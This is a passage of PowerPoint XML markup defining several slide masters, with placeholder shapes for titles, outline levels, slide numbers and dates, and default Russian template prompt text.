              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7786800" y="142920"/>
            <a:ext cx="1206000" cy="1283760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{31DEDA4B-F242-4DD6-B4AC-243C94CBD2E2}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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3" r:id="rId3"/>
  </p:sldLayoutIdLst>
</p:sldMaster>
</file>

<file path=ppt/slideMasters/slideMaster3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8" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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199" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="221040"/>
            <a:ext cx="8228880" cy="124992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Для правки текста заглавия щёлкните мышью</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="59"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{67D497C2-D53F-4E88-A9C0-5CA4C3589C7F}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="60"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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07" r:id="rId2"/>
  </p:sldLayoutIdLst>
</p:sldMaster>
</file>

<file path=ppt/slideMasters/slideMaster3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3" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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204" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="61"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{A29D8FE1-EE5B-49FC-A5CF-48E25F940566}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="62"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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09" r:id="rId2"/>
  </p:sldLayoutIdLst>
</p:sldMaster>
</file>

<file path=ppt/slideMasters/slideMaster3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6" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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207" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="63"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{CA07A539-6125-467F-896C-371EE322D58F}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="64"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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11" r:id="rId2"/>
  </p:sldLayoutIdLst>
</p:sldMaster>
</file>

<file path=ppt/slideMasters/slideMaster3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9" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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210" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="65"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{590C796E-446A-49A5-93FC-D671BF27CD41}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="66"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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13" r:id="rId2"/>
  </p:sldLayoutIdLst>
</p:sldMaster>
</file>

<file path=ppt/slideMasters/slideMaster3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2" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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213" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="221040"/>
            <a:ext cx="8228880" cy="124992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Для правки текста заглавия щёлкните мышью</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="67"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{45D2E783-00D8-401F-BEC4-62CD189BAA59}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="68"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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15" r:id="rId2"/>
  </p:sldLayoutIdLst>
</p:sldMaster>
</file>

<file path=ppt/slideMasters/slideMaster3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8" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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219" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="69"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{B7DED305-31D1-4369-8072-F5A8A7EED713}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="70"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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17" r:id="rId2"/>
  </p:sldLayoutIdLst>
</p:sldMaster>
</file>

<file path=ppt/slideMasters/slideMaster3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1" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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222" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="71"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{4E5D94D2-7A7B-42F3-B12B-FDD44EF9358F}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="72"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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19" r:id="rId2"/>
  </p:sldLayoutIdLst>
</p:sldMaster>
</file>

<file path=ppt/slideMasters/slideMaster3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4" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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225" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="221040"/>
            <a:ext cx="8228880" cy="124992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Для правки текста заглавия щёлкните мышью</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1604520"/>
            <a:ext cx="8228880" cy="397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Для правки структуры щёлкните мышью</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Второй уровень структуры</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Третий уровень структуры</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Четвёртый уровень структуры</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Пятый уровень структуры</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Шестой уровень структуры</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Седьмой уровень структуры</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="73"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
